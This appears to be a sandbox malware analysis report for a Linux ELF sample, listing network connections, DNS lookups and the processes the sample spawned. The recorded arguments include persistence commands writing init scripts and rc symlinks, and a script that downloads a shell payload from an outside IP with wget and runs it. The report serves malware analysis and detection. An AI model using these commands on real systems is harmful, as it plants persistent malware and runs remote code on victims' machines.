Dec 1, 2024 10:06:27.033035040 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:27.069106102 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.095102072 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:27.153135061 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.212270975 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:27.257049084 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.332290888 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.332345963 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:27.337861061 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:27.356473923 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:27.457860947 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:27.517169952 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:28.582676888 CET | 199 | 40280 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:28.582741976 CET | 40280 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:28.714401007 CET | 199 | 40282 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:28.714452982 CET | 40282 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:28.880134106 CET | 199 | 40284 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:28.880196095 CET | 40284 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:29.018546104 CET | 199 | 40286 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:29.018615961 CET | 40286 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:29.191262007 CET | 199 | 40288 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:29.191333055 CET | 40288 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:29.285080910 CET | 199 | 40290 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:29.285132885 CET | 40290 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:29.629856110 CET | 199 | 40292 | 154.216.19.139 | 192.168.2.13 |
Dec 1, 2024 10:06:29.629956007 CET | 40292 | 199 | 192.168.2.13 | 154.216.19.139 |
Dec 1, 2024 10:06:37.639102936 CET | 48202 | 443 | 192.168.2.13 | 185.125.190.26 |
Dec 1, 2024 10:07:09.127271891 CET | 48202 | 443 | 192.168.2.13 | 185.125.190.26 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 1, 2024 10:06:28.497291088 CET | 56860 | 53 | 192.168.2.13 | 8.8.8.8 |
Dec 1, 2024 10:06:28.497389078 CET | 45078 | 53 | 192.168.2.13 | 8.8.8.8 |
Dec 1, 2024 10:06:28.620208979 CET | 53 | 56860 | 8.8.8.8 | 192.168.2.13 |
Dec 1, 2024 10:06:28.620398998 CET | 53 | 45078 | 8.8.8.8 | 192.168.2.13 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 1, 2024 10:06:28.497291088 CET | 192.168.2.13 | 8.8.8.8 | 0x91ca | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 1, 2024 10:06:28.497389078 CET | 192.168.2.13 | 8.8.8.8 | 0x1e3d | Standard query (0) | 28 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 1, 2024 10:06:28.620208979 CET | 8.8.8.8 | 192.168.2.13 | 0x91ca | No error (0) | 162.213.35.25 | A (IP address) | IN (0x0001) | false | ||
Dec 1, 2024 10:06:28.620208979 CET | 8.8.8.8 | 192.168.2.13 | 0x91ca | No error (0) | 162.213.35.24 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | /tmp/m68k.nn.elf |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/systemctl |
Arguments: | systemctl enable custom.service |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x /etc/init.d/system |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/ln |
Arguments: | ln -s /etc/init.d/system /etc/rcS.d/S99system |
File size: | 76160 bytes |
MD5 hash: | e933cf05571f62c0157d4e2dfcaea282 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x /etc/init.d/m68k.nn.elf |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/mkdir |
Arguments: | mkdir -p /etc/rc.d |
File size: | 88408 bytes |
MD5 hash: | 088c9d1df5a28ed16c726eca15964cb7 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/bin/ln |
Arguments: | ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf |
File size: | 76160 bytes |
MD5 hash: | e933cf05571f62c0157d4e2dfcaea282 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /tmp/m68k.nn.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/libexec/gnome-session-binary |
Arguments: | - |
File size: | 334664 bytes |
MD5 hash: | d9b90be4f7db60cb3c2d3da6a1d31bfb |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 09:06:25 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/libexec/gsd-housekeeping |
Arguments: | /usr/libexec/gsd-housekeeping |
File size: | 51840 bytes |
MD5 hash: | b55f3394a84976ddb92a2915e5d76914 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/lib/udisks2/udisksd |
Arguments: | - |
File size: | 483056 bytes |
MD5 hash: | 1d7ae439cc3d82fa6b127671ce037a24 |
Start time (UTC): | 09:06:26 |
Start date (UTC): | 01/12/2024 |
Path: | /usr/sbin/dumpe2fs |
Arguments: | dumpe2fs -h /dev/dm-0 |
File size: | 31112 bytes |
MD5 hash: | 5c66f7d8f7681a40562cf049ad4b72b4 |